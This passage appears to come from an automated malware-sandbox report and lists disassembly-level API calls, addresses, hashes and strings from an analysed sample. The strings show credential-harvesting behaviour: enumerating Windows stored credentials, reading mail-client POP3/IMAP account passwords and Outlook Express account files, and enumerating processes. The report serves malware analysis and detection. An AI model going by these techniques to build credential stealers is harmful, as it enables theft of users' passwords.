                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                  • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                  Strings
                  Similarity
                  • API ID: AddressProc$Library$FreeLoad
                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                  APIs
                  • sprintf.MSVCRT ref: 0040957B
                  • LoadMenuA.USER32(?,?), ref: 00409589
                    • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                    • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                    • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                    • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                  • DestroyMenu.USER32(00000000), ref: 004095A7
                  • sprintf.MSVCRT ref: 004095EB
                  • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                  • memset.MSVCRT ref: 0040961C
                  • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                  • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                  • DestroyWindow.USER32(00000000), ref: 0040965C
                  Strings
                  Similarity
                  • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                  • String ID: caption$dialog_%d$menu_%d
                  APIs
                    • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                  • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                  • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                  • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                  • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                  • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                  • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                  Strings
                  Similarity
                  • API ID: AddressProc$Library$FreeLoad
                  • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                  APIs
                  • wcsstr.MSVCRT ref: 0040426A
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                  • _mbscpy.MSVCRT ref: 004042D5
                  • _mbscpy.MSVCRT ref: 004042E8
                  • strchr.MSVCRT ref: 004042F6
                  • strlen.MSVCRT ref: 0040430A
                  • sprintf.MSVCRT ref: 0040432B
                  • strchr.MSVCRT ref: 0040433C
                  Strings
                  Similarity
                  • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                  • String ID: %s@gmail.com$www.google.com
                  APIs
                  Strings
                  Similarity
                  • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                  • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                  APIs
                  • strchr.MSVCRT ref: 004100E4
                  • _mbscpy.MSVCRT ref: 004100F2
                    • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                    • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                    • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                  • _mbscpy.MSVCRT ref: 00410142
                  • _mbscat.MSVCRT ref: 0041014D
                  • memset.MSVCRT ref: 00410129
                    • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                    • Part of subcall function 0040715B: _mbscpy.MSVCRT ref: 00407180
                  • memset.MSVCRT ref: 00410171
                  • memcpy.MSVCRT ref: 0041018C
                  • _mbscat.MSVCRT ref: 00410197
                  Strings
                  Similarity
                  • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                  • String ID: \systemroot
                  APIs
                  Strings
                  Similarity
                  • API ID: memcpy$strlen
                  • String ID: -journal$-wal$immutable$nolock
                  APIs
                    • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                  • wcslen.MSVCRT ref: 0040874A
                  • _wcsncoll.MSVCRT ref: 00408794
                  • memset.MSVCRT ref: 0040882A
                  • memcpy.MSVCRT ref: 00408849
                  • wcschr.MSVCRT ref: 0040889F
                  • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                  Strings
                  Similarity
                  • API ID: AddressProc$FreeLibraryLoadLocal_wcsncollmemcpymemsetwcschrwcslen
                  • String ID: J$Microsoft_WinInet
                  APIs
                    • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                  • _mbscpy.MSVCRT ref: 00409686
                  • _mbscpy.MSVCRT ref: 00409696
                  • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                    • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                  Strings
                  Similarity
                  • API ID: PrivateProfile_mbscpy$AttributesFileString
                  • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                  • API String ID: 888011440-2039793938
                  • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                  • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                  • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                  • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                  APIs
                    • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                  • strchr.MSVCRT ref: 0040327B
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: PrivateProfileStringstrchr
                  • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                  • API String ID: 1348940319-1729847305
                  • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                  • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                  • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                  • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy
                  • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                  • API String ID: 3510742995-3273207271
                  • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                  • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                  • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                  • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                  APIs
                    • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                    • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                    • Part of subcall function 00410863: memcpy.MSVCRT ref: 004108C3
                  • strchr.MSVCRT ref: 0040371F
                  • _mbscpy.MSVCRT ref: 00403748
                  • _mbscpy.MSVCRT ref: 00403758
                  • strlen.MSVCRT ref: 00403778
                  • sprintf.MSVCRT ref: 0040379C
                  • _mbscpy.MSVCRT ref: 004037B2
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: _mbscpy$FromStringUuid$memcpysprintfstrchrstrlen
                  • String ID: %s@gmail.com
                  • API String ID: 500647785-4097000612
                  • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                  • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                  • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                  • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                  APIs
                  • memset.MSVCRT ref: 004094C8
                  • GetDlgCtrlID.USER32(?), ref: 004094D3
                  • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                  • memset.MSVCRT ref: 0040950C
                  • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                  • _strcmpi.MSVCRT ref: 00409531
                    • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                  • String ID: sysdatetimepick32
                  • API String ID: 3411445237-4169760276
                  • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                  • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                  • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                  • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                  APIs
                  • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                  • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                  • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                  • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                  • GetSysColor.USER32(0000000F), ref: 0040B472
                  • DeleteObject.GDI32(?), ref: 0040B4A6
                  • DeleteObject.GDI32(00000000), ref: 0040B4A9
                  • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: MessageSend$DeleteImageLoadObject$Color
                  • String ID:
                  • API String ID: 3642520215-0
                  • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                  • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                  • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                  • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                  APIs
                  • GetSystemMetrics.USER32(00000011), ref: 004072E7
                  • GetSystemMetrics.USER32(00000010), ref: 004072ED
                  • GetDC.USER32(00000000), ref: 004072FB
                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                  • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                  • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                  • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                  • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                  • String ID:
                  • API String ID: 1999381814-0
                  • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                  • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                  • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                  • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpymemset
                  • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                  • API String ID: 1297977491-3883738016
                  • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                  • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                  • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                  • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                  APIs
                    • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                    • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                    • Part of subcall function 00449550: memcpy.MSVCRT ref: 004495C8
                    • Part of subcall function 00449550: memcpy.MSVCRT ref: 00449616
                  • memcpy.MSVCRT ref: 0044972E
                  • memcpy.MSVCRT ref: 0044977B
                  • memcpy.MSVCRT ref: 004497F6
                    • Part of subcall function 00449260: memcpy.MSVCRT ref: 00449291
                    • Part of subcall function 00449260: memcpy.MSVCRT ref: 004492DD
                  • memcpy.MSVCRT ref: 00449846
                  • memcpy.MSVCRT ref: 00449887
                  • memcpy.MSVCRT ref: 004498B8
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$memset
                  • String ID: gj
                  • API String ID: 438689982-4203073231
                  • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                  • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                  • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                  • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: __aulldvrm$__aullrem
                  • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                  • API String ID: 643879872-978417875
                  • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                  • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                  • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                  • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                  APIs
                  • memset.MSVCRT ref: 0040810E
                    • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                    • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                    • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                  • LocalFree.KERNEL32(?,?,?,?,?,00000000,7508EB20,?), ref: 004081B9
                    • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                    • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                    • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                  • String ID: POP3_credentials$POP3_host$POP3_name
                  • API String ID: 524865279-2190619648
                  • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                  • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                  • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                  • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: ItemMenu$CountInfomemsetstrchr
                  • String ID: 0$6
                  • API String ID: 2300387033-3849865405
                  • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                  • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                  • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                  • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpystrlen$memsetsprintf
                  • String ID: %s (%s)
                  • API String ID: 3756086014-1363028141
                  • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                  • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                  • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                  • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: _mbscat$memsetsprintf
                  • String ID: %2.2X
                  • API String ID: 125969286-791839006
                  • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                  • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                  • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                  • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                  APIs
                    • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                  • ??2@YAPAXI@Z.MSVCRT ref: 004441C2
                  • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                    • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                    • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                    • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
                    • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                    • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                    • Part of subcall function 00444059: memcpy.MSVCRT ref: 004440EB
                    • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                  • ??3@YAXPAX@Z.MSVCRT ref: 004441FC
                  • CloseHandle.KERNEL32(?), ref: 00444206
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                  • String ID: ACD
                  • API String ID: 1886237854-620537770
                  • Opcode ID: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                  • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                  • Opcode Fuzzy Hash: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                  • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                  APIs
                  • memset.MSVCRT ref: 004091EC
                  • sprintf.MSVCRT ref: 00409201
                    • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                    • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                    • Part of subcall function 0040929C: _mbscpy.MSVCRT ref: 004092FC
                  • SetWindowTextA.USER32(?,?), ref: 00409228
                  • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                  • String ID: caption$dialog_%d
                  • API String ID: 2923679083-4161923789
                  • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                  • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                  • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                  • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                  APIs
                  • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                  • memset.MSVCRT ref: 00410246
                  • memset.MSVCRT ref: 00410258
                    • Part of subcall function 004100CC: _mbscpy.MSVCRT ref: 004100F2
                  • memset.MSVCRT ref: 0041033F
                  • _mbscpy.MSVCRT ref: 00410364
                  • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$_mbscpy$CloseHandleOpenProcess
                  • String ID:
                  • API String ID: 3974772901-0
                  • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                  • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                  • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                  • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                  APIs
                  • wcslen.MSVCRT ref: 0044406C
                  • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                  • strlen.MSVCRT ref: 004440D1
                    • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT ref: 00443507
                    • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                  • memcpy.MSVCRT ref: 004440EB
                  • ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                  • String ID:
                  • API String ID: 577244452-0
                  • Opcode ID: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                  • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                  • Opcode Fuzzy Hash: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                  • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                  APIs
                    • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                    • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                  • _strcmpi.MSVCRT ref: 00404518
                  • _strcmpi.MSVCRT ref: 00404536
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: _strcmpi$memcpystrlen
                  • String ID: imap$pop3$smtp
                  • API String ID: 2025310588-821077329
                  • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                  • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                  • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
